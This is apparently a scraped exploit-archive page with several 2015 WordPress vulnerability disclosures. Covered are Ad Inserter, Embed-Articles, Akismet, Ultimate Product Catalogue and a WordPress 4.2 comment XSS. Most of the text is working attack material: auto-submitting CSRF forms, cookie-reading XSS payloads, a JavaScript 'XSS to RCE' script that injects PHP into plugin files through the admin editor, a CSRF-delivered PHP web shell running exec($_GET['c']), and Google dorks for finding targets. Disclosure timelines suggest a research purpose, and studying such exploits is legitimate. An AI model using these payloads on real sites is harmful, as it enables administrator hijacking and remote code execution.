      <input type="hidden" name="ad7_widget_settings_category" value="0" />
      <input type="hidden" name="ad7_widget_settings_category" value="1" />
      <input type="hidden" name="ad7_widget_settings_search" value="0" />
      <input type="hidden" name="ad7_widget_settings_search" value="1" />
      <input type="hidden" name="ad7_widget_settings_archive" value="0" />
      <input type="hidden" name="ad7_widget_settings_archive" value="1" />
      <input type="hidden" name="ad7_after_day" value="0" />
      <input type="hidden" name="ad7_general_tag" value="gadgets" />
      <input type="hidden" name="ad7_block_user" value="" />
      <input type="hidden" name="ad7_domain_list_type" value="Black List" />
      <input type="hidden" name="ad7_block_cat" value="" />
      <input type="hidden" name="ad7_block_cat_type" value="Black List" />
      <input type="hidden" name="ad7_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad7_paragraph_text" value="" />
      <input type="hidden" name="ad7_paragraphNumber" value="0" />
      <input type="hidden" name="ad7_directionType" value="From Top" />
      <input type="hidden" name="ad7_excerptNumber" value="0" />
      <input type="hidden" name="ad7_enable_manual" value="0" />
      <input type="hidden" name="ad7_enable_php_call" value="0" />
      <input type="hidden" name="ad8_name" value="Block 8" />
      <input type="hidden" name="ad8_process_php" value="0" />
      <input type="hidden" name="ad8_data" value="" />
      <input type="hidden" name="ad8_displayType" value="None" />
      <input type="hidden" name="ad8_display_for_users" value="all" />
      <input type="hidden" name="ad8_display_for_devices" value="all" />
      <input type="hidden" name="ad8_floatType" value="None" />
      <input type="hidden" name="ad8_custom_css" value="" />
      <input type="hidden" name="ad8_widget_settings_post" value="0" />
      <input type="hidden" name="ad8_widget_settings_post" value="1" />
      <input type="hidden" name="ad8_widget_settings_page" value="0" />
      <input type="hidden" name="ad8_widget_settings_home" value="0" />
      <input type="hidden" name="ad8_widget_settings_home" value="1" />
      <input type="hidden" name="ad8_widget_settings_category" value="0" />
      <input type="hidden" name="ad8_widget_settings_category" value="1" />
      <input type="hidden" name="ad8_widget_settings_search" value="0" />
      <input type="hidden" name="ad8_widget_settings_search" value="1" />
      <input type="hidden" name="ad8_widget_settings_archive" value="0" />
      <input type="hidden" name="ad8_widget_settings_archive" value="1" />
      <input type="hidden" name="ad8_after_day" value="0" />
      <input type="hidden" name="ad8_general_tag" value="gadgets" />
      <input type="hidden" name="ad8_block_user" value="" />
      <input type="hidden" name="ad8_domain_list_type" value="Black List" />
      <input type="hidden" name="ad8_block_cat" value="" />
      <input type="hidden" name="ad8_block_cat_type" value="Black List" />
      <input type="hidden" name="ad8_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad8_paragraph_text" value="" />
      <input type="hidden" name="ad8_paragraphNumber" value="0" />
      <input type="hidden" name="ad8_directionType" value="From Top" />
      <input type="hidden" name="ad8_excerptNumber" value="0" />
      <input type="hidden" name="ad8_enable_manual" value="0" />
      <input type="hidden" name="ad8_enable_php_call" value="0" />
      <input type="hidden" name="ad9_name" value="Block 9" />
      <input type="hidden" name="ad9_process_php" value="0" />
      <input type="hidden" name="ad9_data" value="" />
      <input type="hidden" name="ad9_displayType" value="None" />
      <input type="hidden" name="ad9_display_for_users" value="all" />
      <input type="hidden" name="ad9_display_for_devices" value="all" />
      <input type="hidden" name="ad9_floatType" value="None" />
      <input type="hidden" name="ad9_custom_css" value="" />
      <input type="hidden" name="ad9_widget_settings_post" value="0" />
      <input type="hidden" name="ad9_widget_settings_post" value="1" />
      <input type="hidden" name="ad9_widget_settings_page" value="0" />
      <input type="hidden" name="ad9_widget_settings_home" value="0" />
      <input type="hidden" name="ad9_widget_settings_home" value="1" />
      <input type="hidden" name="ad9_widget_settings_category" value="0" />
      <input type="hidden" name="ad9_widget_settings_category" value="1" />
      <input type="hidden" name="ad9_widget_settings_search" value="0" />
      <input type="hidden" name="ad9_widget_settings_search" value="1" />
      <input type="hidden" name="ad9_widget_settings_archive" value="0" />
      <input type="hidden" name="ad9_widget_settings_archive" value="1" />
      <input type="hidden" name="ad9_after_day" value="0" />
      <input type="hidden" name="ad9_general_tag" value="gadgets" />
      <input type="hidden" name="ad9_block_user" value="" />
      <input type="hidden" name="ad9_domain_list_type" value="Black List" />
      <input type="hidden" name="ad9_block_cat" value="" />
      <input type="hidden" name="ad9_block_cat_type" value="Black List" />
      <input type="hidden" name="ad9_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad9_paragraph_text" value="" />
      <input type="hidden" name="ad9_paragraphNumber" value="0" />
      <input type="hidden" name="ad9_directionType" value="From Top" />
      <input type="hidden" name="ad9_excerptNumber" value="0" />
      <input type="hidden" name="ad9_enable_manual" value="0" />
      <input type="hidden" name="ad9_enable_php_call" value="0" />
      <input type="hidden" name="ad10_name" value="Block 10" />
      <input type="hidden" name="ad10_process_php" value="0" />
      <input type="hidden" name="ad10_data" value="" />
      <input type="hidden" name="ad10_displayType" value="None" />
      <input type="hidden" name="ad10_display_for_users" value="all" />
      <input type="hidden" name="ad10_display_for_devices" value="all" />
      <input type="hidden" name="ad10_floatType" value="None" />
      <input type="hidden" name="ad10_custom_css" value="" />
      <input type="hidden" name="ad10_widget_settings_post" value="0" />
      <input type="hidden" name="ad10_widget_settings_post" value="1" />
      <input type="hidden" name="ad10_widget_settings_page" value="0" />
      <input type="hidden" name="ad10_widget_settings_home" value="0" />
      <input type="hidden" name="ad10_widget_settings_home" value="1" />
      <input type="hidden" name="ad10_widget_settings_category" value="0" />
      <input type="hidden" name="ad10_widget_settings_category" value="1" />
      <input type="hidden" name="ad10_widget_settings_search" value="0" />
      <input type="hidden" name="ad10_widget_settings_search" value="1" />
      <input type="hidden" name="ad10_widget_settings_archive" value="0" />
      <input type="hidden" name="ad10_widget_settings_archive" value="1" />
      <input type="hidden" name="ad10_after_day" value="0" />
      <input type="hidden" name="ad10_general_tag" value="gadgets" />
      <input type="hidden" name="ad10_block_user" value="" />
      <input type="hidden" name="ad10_domain_list_type" value="Black List" />
      <input type="hidden" name="ad10_block_cat" value="" />
      <input type="hidden" name="ad10_block_cat_type" value="Black List" />
      <input type="hidden" name="ad10_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad10_paragraph_text" value="" />
      <input type="hidden" name="ad10_paragraphNumber" value="0" />
      <input type="hidden" name="ad10_directionType" value="From Top" />
      <input type="hidden" name="ad10_excerptNumber" value="0" />
      <input type="hidden" name="ad10_enable_manual" value="0" />
      <input type="hidden" name="ad10_enable_php_call" value="0" />
      <input type="hidden" name="ad11_name" value="Block 11" />
      <input type="hidden" name="ad11_process_php" value="0" />
      <input type="hidden" name="ad11_data" value="" />
      <input type="hidden" name="ad11_displayType" value="None" />
      <input type="hidden" name="ad11_display_for_users" value="all" />
      <input type="hidden" name="ad11_display_for_devices" value="all" />
      <input type="hidden" name="ad11_floatType" value="None" />
      <input type="hidden" name="ad11_custom_css" value="" />
      <input type="hidden" name="ad11_widget_settings_post" value="0" />
      <input type="hidden" name="ad11_widget_settings_post" value="1" />
      <input type="hidden" name="ad11_widget_settings_page" value="0" />
      <input type="hidden" name="ad11_widget_settings_home" value="0" />
      <input type="hidden" name="ad11_widget_settings_home" value="1" />
      <input type="hidden" name="ad11_widget_settings_category" value="0" />
      <input type="hidden" name="ad11_widget_settings_category" value="1" />
      <input type="hidden" name="ad11_widget_settings_search" value="0" />
      <input type="hidden" name="ad11_widget_settings_search" value="1" />
      <input type="hidden" name="ad11_widget_settings_archive" value="0" />
      <input type="hidden" name="ad11_widget_settings_archive" value="1" />
      <input type="hidden" name="ad11_after_day" value="0" />
      <input type="hidden" name="ad11_general_tag" value="gadgets" />
      <input type="hidden" name="ad11_block_user" value="" />
      <input type="hidden" name="ad11_domain_list_type" value="Black List" />
      <input type="hidden" name="ad11_block_cat" value="" />
      <input type="hidden" name="ad11_block_cat_type" value="Black List" />
      <input type="hidden" name="ad11_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad11_paragraph_text" value="" />
      <input type="hidden" name="ad11_paragraphNumber" value="0" />
      <input type="hidden" name="ad11_directionType" value="From Top" />
      <input type="hidden" name="ad11_excerptNumber" value="0" />
      <input type="hidden" name="ad11_enable_manual" value="0" />
      <input type="hidden" name="ad11_enable_php_call" value="0" />
      <input type="hidden" name="ad12_name" value="Block 12" />
      <input type="hidden" name="ad12_process_php" value="0" />
      <input type="hidden" name="ad12_data" value="" />
      <input type="hidden" name="ad12_displayType" value="None" />
      <input type="hidden" name="ad12_display_for_users" value="all" />
      <input type="hidden" name="ad12_display_for_devices" value="all" />
      <input type="hidden" name="ad12_floatType" value="None" />
      <input type="hidden" name="ad12_custom_css" value="" />
      <input type="hidden" name="ad12_widget_settings_post" value="0" />
      <input type="hidden" name="ad12_widget_settings_post" value="1" />
      <input type="hidden" name="ad12_widget_settings_page" value="0" />
      <input type="hidden" name="ad12_widget_settings_home" value="0" />
      <input type="hidden" name="ad12_widget_settings_home" value="1" />
      <input type="hidden" name="ad12_widget_settings_category" value="0" />
      <input type="hidden" name="ad12_widget_settings_category" value="1" />
      <input type="hidden" name="ad12_widget_settings_search" value="0" />
      <input type="hidden" name="ad12_widget_settings_search" value="1" />
      <input type="hidden" name="ad12_widget_settings_archive" value="0" />
      <input type="hidden" name="ad12_widget_settings_archive" value="1" />
      <input type="hidden" name="ad12_after_day" value="0" />
      <input type="hidden" name="ad12_general_tag" value="gadgets" />
      <input type="hidden" name="ad12_block_user" value="" />
      <input type="hidden" name="ad12_domain_list_type" value="Black List" />
      <input type="hidden" name="ad12_block_cat" value="" />
      <input type="hidden" name="ad12_block_cat_type" value="Black List" />
      <input type="hidden" name="ad12_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad12_paragraph_text" value="" />
      <input type="hidden" name="ad12_paragraphNumber" value="0" />
      <input type="hidden" name="ad12_directionType" value="From Top" />
      <input type="hidden" name="ad12_excerptNumber" value="0" />
      <input type="hidden" name="ad12_enable_manual" value="0" />
      <input type="hidden" name="ad12_enable_php_call" value="0" />
      <input type="hidden" name="ad13_name" value="Block 13" />
      <input type="hidden" name="ad13_process_php" value="0" />
      <input type="hidden" name="ad13_data" value="" />
      <input type="hidden" name="ad13_displayType" value="None" />
      <input type="hidden" name="ad13_display_for_users" value="all" />
      <input type="hidden" name="ad13_display_for_devices" value="all" />
      <input type="hidden" name="ad13_floatType" value="None" />
      <input type="hidden" name="ad13_custom_css" value="" />
      <input type="hidden" name="ad13_widget_settings_post" value="0" />
      <input type="hidden" name="ad13_widget_settings_post" value="1" />
      <input type="hidden" name="ad13_widget_settings_page" value="0" />
      <input type="hidden" name="ad13_widget_settings_home" value="0" />
      <input type="hidden" name="ad13_widget_settings_home" value="1" />
      <input type="hidden" name="ad13_widget_settings_category" value="0" />
      <input type="hidden" name="ad13_widget_settings_category" value="1" />
      <input type="hidden" name="ad13_widget_settings_search" value="0" />
      <input type="hidden" name="ad13_widget_settings_search" value="1" />
      <input type="hidden" name="ad13_widget_settings_archive" value="0" />
      <input type="hidden" name="ad13_widget_settings_archive" value="1" />
      <input type="hidden" name="ad13_after_day" value="0" />
      <input type="hidden" name="ad13_general_tag" value="gadgets" />
      <input type="hidden" name="ad13_block_user" value="" />
      <input type="hidden" name="ad13_domain_list_type" value="Black List" />
      <input type="hidden" name="ad13_block_cat" value="" />
      <input type="hidden" name="ad13_block_cat_type" value="Black List" />
      <input type="hidden" name="ad13_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad13_paragraph_text" value="" />
      <input type="hidden" name="ad13_paragraphNumber" value="0" />
      <input type="hidden" name="ad13_directionType" value="From Top" />
      <input type="hidden" name="ad13_excerptNumber" value="0" />
      <input type="hidden" name="ad13_enable_manual" value="0" />
      <input type="hidden" name="ad13_enable_php_call" value="0" />
      <input type="hidden" name="ad14_name" value="Block 14" />
      <input type="hidden" name="ad14_process_php" value="0" />
      <input type="hidden" name="ad14_data" value="" />
      <input type="hidden" name="ad14_displayType" value="None" />
      <input type="hidden" name="ad14_display_for_users" value="all" />
      <input type="hidden" name="ad14_display_for_devices" value="all" />
      <input type="hidden" name="ad14_floatType" value="None" />
      <input type="hidden" name="ad14_custom_css" value="" />
      <input type="hidden" name="ad14_widget_settings_post" value="0" />
      <input type="hidden" name="ad14_widget_settings_post" value="1" />
      <input type="hidden" name="ad14_widget_settings_page" value="0" />
      <input type="hidden" name="ad14_widget_settings_home" value="0" />
      <input type="hidden" name="ad14_widget_settings_home" value="1" />
      <input type="hidden" name="ad14_widget_settings_category" value="0" />
      <input type="hidden" name="ad14_widget_settings_category" value="1" />
      <input type="hidden" name="ad14_widget_settings_search" value="0" />
      <input type="hidden" name="ad14_widget_settings_search" value="1" />
      <input type="hidden" name="ad14_widget_settings_archive" value="0" />
      <input type="hidden" name="ad14_widget_settings_archive" value="1" />
      <input type="hidden" name="ad14_after_day" value="0" />
      <input type="hidden" name="ad14_general_tag" value="gadgets" />
      <input type="hidden" name="ad14_block_user" value="" />
      <input type="hidden" name="ad14_domain_list_type" value="Black List" />
      <input type="hidden" name="ad14_block_cat" value="" />
      <input type="hidden" name="ad14_block_cat_type" value="Black List" />
      <input type="hidden" name="ad14_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad14_paragraph_text" value="" />
      <input type="hidden" name="ad14_paragraphNumber" value="0" />
      <input type="hidden" name="ad14_directionType" value="From Top" />
      <input type="hidden" name="ad14_excerptNumber" value="0" />
      <input type="hidden" name="ad14_enable_manual" value="0" />
      <input type="hidden" name="ad14_enable_php_call" value="0" />
      <input type="hidden" name="ad15_name" value="Block 15" />
      <input type="hidden" name="ad15_process_php" value="0" />
      <input type="hidden" name="ad15_data" value="" />
      <input type="hidden" name="ad15_displayType" value="None" />
      <input type="hidden" name="ad15_display_for_users" value="all" />
      <input type="hidden" name="ad15_display_for_devices" value="all" />
      <input type="hidden" name="ad15_floatType" value="None" />
      <input type="hidden" name="ad15_custom_css" value="" />
      <input type="hidden" name="ad15_widget_settings_post" value="0" />
      <input type="hidden" name="ad15_widget_settings_post" value="1" />
      <input type="hidden" name="ad15_widget_settings_page" value="0" />
      <input type="hidden" name="ad15_widget_settings_home" value="0" />
      <input type="hidden" name="ad15_widget_settings_home" value="1" />
      <input type="hidden" name="ad15_widget_settings_category" value="0" />
      <input type="hidden" name="ad15_widget_settings_category" value="1" />
      <input type="hidden" name="ad15_widget_settings_search" value="0" />
      <input type="hidden" name="ad15_widget_settings_search" value="1" />
      <input type="hidden" name="ad15_widget_settings_archive" value="0" />
      <input type="hidden" name="ad15_widget_settings_archive" value="1" />
      <input type="hidden" name="ad15_after_day" value="0" />
      <input type="hidden" name="ad15_general_tag" value="gadgets" />
      <input type="hidden" name="ad15_block_user" value="" />
      <input type="hidden" name="ad15_domain_list_type" value="Black List" />
      <input type="hidden" name="ad15_block_cat" value="" />
      <input type="hidden" name="ad15_block_cat_type" value="Black List" />
      <input type="hidden" name="ad15_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad15_paragraph_text" value="" />
      <input type="hidden" name="ad15_paragraphNumber" value="0" />
      <input type="hidden" name="ad15_directionType" value="From Top" />
      <input type="hidden" name="ad15_excerptNumber" value="0" />
      <input type="hidden" name="ad15_enable_manual" value="0" />
      <input type="hidden" name="ad15_enable_php_call" value="0" />
      <input type="hidden" name="ad16_name" value="Block 16" />
      <input type="hidden" name="ad16_process_php" value="0" />
      <input type="hidden" name="ad16_data" value="" />
      <input type="hidden" name="ad16_displayType" value="None" />
      <input type="hidden" name="ad16_display_for_users" value="all" />
      <input type="hidden" name="ad16_display_for_devices" value="all" />
      <input type="hidden" name="ad16_floatType" value="None" />
      <input type="hidden" name="ad16_custom_css" value="" />
      <input type="hidden" name="ad16_widget_settings_post" value="0" />
      <input type="hidden" name="ad16_widget_settings_post" value="1" />
      <input type="hidden" name="ad16_widget_settings_page" value="0" />
      <input type="hidden" name="ad16_widget_settings_home" value="0" />
      <input type="hidden" name="ad16_widget_settings_home" value="1" />
      <input type="hidden" name="ad16_widget_settings_category" value="0" />
      <input type="hidden" name="ad16_widget_settings_category" value="1" />
      <input type="hidden" name="ad16_widget_settings_search" value="0" />
      <input type="hidden" name="ad16_widget_settings_search" value="1" />
      <input type="hidden" name="ad16_widget_settings_archive" value="0" />
      <input type="hidden" name="ad16_widget_settings_archive" value="1" />
      <input type="hidden" name="ad16_after_day" value="0" />
      <input type="hidden" name="ad16_general_tag" value="gadgets" />
      <input type="hidden" name="ad16_block_user" value="" />
      <input type="hidden" name="ad16_domain_list_type" value="Black List" />
      <input type="hidden" name="ad16_block_cat" value="" />
      <input type="hidden" name="ad16_block_cat_type" value="Black List" />
      <input type="hidden" name="ad16_minimum_paragraphs" value="0" />
      <input type="hidden" name="ad16_paragraph_text" value="" />
      <input type="hidden" name="ad16_paragraphNumber" value="0" />
      <input type="hidden" name="ad16_directionType" value="From Top" />
      <input type="hidden" name="ad16_excerptNumber" value="0" />
      <input type="hidden" name="ad16_enable_manual" value="0" />
      <input type="hidden" name="ad16_enable_php_call" value="0" />
      <input type="hidden" name="adH_process_php" value="0" />
      <input type="hidden" name="adH_data" value="" />
      <input type="hidden" name="adH_enable" value="0" />
      <input type="hidden" name="adF_process_php" value="0" />
      <input type="hidden" name="adF_data" value="" />
      <input type="hidden" name="adF_enable" value="0" />
      <input type="hidden" name="syntax-highlighter-theme" value="ad_inserter" />
      <input type="hidden" name="block-class-name" value="code-block" />
      <input type="hidden" name="ai-active-tab" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
Mitigation 
==========
Update to Latest version 1.5.3
 
Change Log
==========
https://wordpress.org/plugins/ad-inserter/changelog/
 
Disclosure 
==========
18-April-2015 Reported to Developer
2-may-2015     Fixed By Developer
credits
=======
* Kaustubh Padwad 
* Information Security Researcher
* kingkaustubh (at) me (dot) com 
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

(142)

9May/150

WordPress Embed-Articles 7.0.3 CSRF / XSS

======================================================
CSRF/Stored XSS Vulnerability in embed articles Plugin
======================================================
 
 
. contents:: Table Of Content
 
Overview
========
 
* Title :CSRF and Stored XSS Vulnerability in embed-articles Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/embed-articles/
* Severity: HIGH
* Version Affected: Version 7.0.3 and mostly prior to it
* Version Tested : Version 7.0.3
* version patched:
 
Description 
===========
 
Vulnerable Parameter 
--------------------
 
* API Key
 
About Vulnerability
-------------------
This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, adminâ??s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc.
 
Vulnerability Class
=================== 
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
 
Steps to Reproduce: (POC)
=========================
 
After installing the plugin
 
1. Goto settings -> Embed Articles
 
2. Insert this payload ## "> http://www.<script>alert(1)</script .com ## Into  above mention Vulnerable parameter Save settings and see XSS in action
 
3. Visit embed-articles settings page of this plugin anytime later and you can see the script executing as it is stored.
 
Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below
 
CSRF POC Code
=============
<html>
  <body>
    <form action="http://127.0.0.1/wp/wp-admin/admin.php?page=embedarticles&lock=no" method="POST">
      <input type="hidden" name="embedarticles_hidden" value="Y" />
      <input type="hidden" name="pub_value" value=""> "> http://www.<script>alert(1)</script .com" />
      <input type="hidden" name="display" value="bottom" />
      <input type="hidden" name="Submit" value="Update Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
Mitigation 
==========
Plugin Closed
 
Change Log
==========
Plugin Closed
 
Disclosure 
==========
07-April-2015 Reported to Developer
Plugin Closed
credits
=======
* Kaustubh Padwad 
* Information Security Researcher
* kingkaustubh (at) me (dot) com [email concealed] 
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

(341)

9May/150

WordPress Akismet 3.1.1 Cross Site Scripting

# Exploit Title: Wordpress Akismet 3.1.1 Plugin - XSS Vulnerability
# Google Dork: inurl:/wp-content/plugins/akismet/akismet.php
# Date: 2014-12-29
# Exploit Author: Ehsan Ice
# Software Link: https://akismet.com/ ,
https://wordpress.org/plugins/akismet/developers/
# Download Link: https://downloads.wordpress.org/plugin/akismet.3.1.1.zip
# Version : 3.1.1
# Tested on: Kali , Windows
# CVE : N/A
 
 XSS Vulnerability
 http://site/wp-content/plugins/akismet/akismet.php
 http://site/wp-content/plugins/akismet/class.akismet-admin.php
 
  Userinput reaches sensitive sink when function add_comment_author_url()
is called.
 
428: print print (wp_update_comment($comment));  // class.akismet-admin.php
426: $comment['comment_author_url'] = esc_url($_POST['url']);  //
class.akismet-admin.php
 
requires:
423: if(!empty($_POST['id']) && !empty($_POST['url']) &&
check_admin_referer('comment_author_url_nonce'))
425: if($comment && current_user_can('edit_comment',
$comment['comment_ID']))
422: function add_comment_author_url()
 
 
Special Tnx : Milad Hacking , MMA Defacer , Ramin Ramz , Alireza Attacker
Xodiak , Adel Netcat , Mr.Tekide , Ang3l--Demon

(179)

9May/150

WordPress 4.2.1 XSS / Code Execution

/*
Author: @Evex_1337
Title: Wordpress XSS to RCE
Description: This Exploit Uses XSS Vulnerabilities in Wordpress
Plugins/Themes/Core To End Up Executing Code After The Being Triggered With
Administrator Previliged User. ¯\_(ツ)_/¯
Reference: http://research.evex.pw/?vuln=14
Enjoy.
 
*/
//Installed Plugins Page
plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ?
'plugins.php' : 'wp-admin/plugins.php';
//Inject "XSS" Div
jQuery('body').append('<div id="xss" ></div>');
xss_div = jQuery('#xss');
xss_div.hide();
//Get Installed Plugins Page Source and Append it to "XSS" Div
jQuery.ajax({
  url: plugins,
  type: 'GET',
  async: false,
  cache: false,
  timeout: 30000,
  success: function (txt) {
    xss_div.html(txt);
  }
});
//Put All Plugins Edit URL in Array
plugins_edit = [
];
xss_div.find('a').each(function () {
  if (jQuery(this).attr('href').indexOf('?file=') != - 1) {
    plugins_edit.push(jQuery(this).attr('href'));
  }
});
//Inject Payload
for (var i = 0; i < plugins_edit.length; i++) {
  jQuery.ajax({
    url: plugins_edit[i],
    type: 'GET',
    async: false,
    cache: false,
    timeout: 30000,
    success: function (txt) {
      xss_div.html(txt);
      _wpnonce =
jQuery('form#template').context.body.innerHTML.match('name="_wpnonce"
value="(.*?)"') [1];
      old_code = jQuery('form#template div textarea#newcontent') [0].value;
      payload = '<?php phpinfo(); ?>';
      new_code = payload + '\n' + old_code;
      file = plugins_edit[i].split('file=') [1];
      jQuery.ajax({
        url: plugins_edit[i],
        type: 'POST',
        data: {
          '_wpnonce': _wpnonce,
          'newcontent': new_code,
          'action': 'update',
          'file': file,
          'submit': 'Update File'
        },
        async: false,
        cache: false,
        timeout: 30000,
        success: function (txt) {
          xss_div.html(txt);
          if (jQuery('form#template div textarea#newcontent')
[0].value.indexOf(payload) != - 1) {
            // Passed, this is up to you ( skiddies Filter :D )
            injected_file = window.location.href.split('wp-admin') [0] +
'/wp-content/plugins/' + file; //
http://localhost/wp//wp-content/plugins/504-redirects/redirects.php
            throw new Error('');
          }
        }
      });
    }
  });
}

(117)

9May/150

WordPress Ultimate Product Catalogue 3.1.2 XSS / CSRF / File Upload

# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate
Product Catalogue 3.1.2
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.5
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
 
1. Summary:
 
Ultimate Product Catalogue is a responsive and easily customizable plugin
for all your product catalogue needs. It has +63.000 downloads, +4.000
active installations.
 
Product Name and Description and File Upload formulary of plugin Ultimate
Product Catalog lacks of proper CSRF protection and proper filtering.
Allowing an attacker to alter a product pressented to a customer or the
wordpress administrators and insert XSS in his product name and
description. It also allows an attacker to upload a php script though a
CSRF due to a lack of file type filtering when uploading it.
 
2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Comunicated to developer company etoilewebdesign.com
 
- 22/04/2015: Response from etoilewebdesign.com
 
 and fixed two SQLi in 3.1.3 but not these vulnerabilities.
        - 28/04/2015: Fixed version in 3.1.5 without notifying me.
 
3. Vulnerable code:
 
    In file html/ProductPage multiple lines.
 
3. Proof of concept:
 
https://www.youtube.com/watch?v=roB_ken6U4o
 
 
 ----------------------------------------------------------------------------------------------
   ------------- CSRF & XSS in Product Description and Name -----------
 
 ----------------------------------------------------------------------------------------------
 
<iframe width=0 height=0 style="display:none" name="csrf-frame"></iframe>
<form method='POST'
    action='http://
<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'
    target="csrf-frame"
    id="csrf-form">
        <input type='hidden' name='action' value='Edit_Product'>
        <input type='hidden' name='_wp_http_referer'
value='/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'/>
        <input type='hidden' name='Item_Name' value="Product
name</a><script>alert('Product Name says: '+document.cookie)</script><a>"/>
        <input type='hidden' name='Item_Slug' value='asdf'/>
        <input type='hidden' name='Item_ID' value='16'/>
        <input type='hidden' name='Item_Image' value='
http://i.imgur.com/6cWKujq.gif'>
        <input type='hidden' name='Item_Price' value='666'>
        <input type='hidden' name='Item_Description' value="Product
description says<script>alert('Product description says:
'+document.cookie)</script>"/>
        <input type='hidden' name='Item_SEO_Description' value='seo desc'>
        <input type='hidden' name='Item_Link' value=''>
        <input type='hidden' name='Item_Display_Status' value='Show'>
        <input type='hidden' name='Category_ID' value=''>
        <input type='hidden' name='SubCategory_ID' value=''>
        <input style="display:none" type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
 
 
 
 ----------------------------------------------------------------------------------------------
   -------- CSRF & File Upload in Product Description and Name ------
 
 ----------------------------------------------------------------------------------------------
 
<html>
    <body onload="submitRequest();">
        <script>
          function submitRequest()
          {
            var xhr = new XMLHttpRequest();
            xhr.open("POST",
"http://<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_AddProductSpreadsheet&DisplayPage=Product",
true);
            xhr.setRequestHeader("Host", "<web>");
            xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
            xhr.setRequestHeader("Cache-Control", "max-age=0");
            xhr.setRequestHeader("Accept-Language",
"en-US,en;q=0.8,es;q=0.6");
            xhr.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT
6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37
Safari/537.36");
            xhr.setRequestHeader("Accept-Encoding", "gzip, deflate");
            xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=----WebKitFormBoundarylPTZvbxAcw0q01W3");
            var body = "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +
              "Content-Disposition: form-data;
name=\"Products_Spreadsheet\"; filename=\"cooldog.php\"\r\n" +
              "Content-Type: application/octet-stream\r\n" +
              "\r\n" +
              "<?php\r\n" +
              "exec($_GET['c'],$output);\r\n" +
              "foreach ($output as $line) {\r\n" +
              "echo \"<br/>\".$line;\r\n" +
              "}\r\n" +
              "?>\r\n" +
              "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +
              "Content-Disposition: form-data; name='submit'\r\n" +
              "\r\n" +
              "Add New Products\r\n" +
              "------WebKitFormBoundarylPTZvbxAcw0q01W3--\r\n" ;
            var aBody = new Uint8Array(body.length);
            for (var i = 0; i < aBody.length; i++)
              aBody[i] = body.charCodeAt(i);
            xhr.send(new Blob([aBody]));
          }
        </script>
        <form action="#">
          <input style="display:none;" type="submit" value="Up!"
onclick="submitRequest();" />
      </form>
  </body>
</html>
 
Te file cooldog.php is no available in path http://
<web>/wp-content/plugins/ultimate-product-catalogue/product-sheets/cooldog.php

(446)

9May/150

WordPress 4.2 Cross Site Scripting

*Overview*
Current versions of WordPress are vulnerable to a stored XSS. An
unauthenticated attacker can inject JavaScript in WordPress comments. The
script is triggered when the comment is viewed.
 
If triggered by a logged-in administrator, under default settings the
attacker can leverage the vulnerability to execute arbitrary code on the
server via the plugin and theme editors.
 
Alternatively the attacker could change the administrator’s password,
create new administrator accounts, or do whatever else the currently
logged-in administrator can do on the target system.
 
*Details*
If the comment text is long enough, it will be truncated when inserted in
the database. The MySQL TEXT type size limit is 64 kilobytes so the comment
has to be quite long.
 
The truncation results in malformed HTML generated on the page. The
attacker can supply any attributes in the allowed HTML tags, in the same
way as the previous stored XSS vulnerabilities affecting WordPress.
 
The vulnerability bears a similarity to the one reported by Cedric Van
Bockhaven in 2014 (patched this week, after 14 months). Instead of using an
invalid UTF-8 character to truncate the comment, this time an excessively
long comment text is used for the same effect.
 
In these two cases the injected JavaScript apparently can't be triggered in
the administrative Dashboard, so these exploits require getting around
comment moderation e.g. by posting one harmless comment first.
 
 
 
 
*Proof of Concept*
Enter the following as a comment:
 
<a title='x onmouseover=alert(unescape(/hello%20world/.source))
style=position:absolute;left:0;top:0;width:5000px;height:5000px
 AAAAAAAAAAAA [64 kb] ...'></a>
 
 
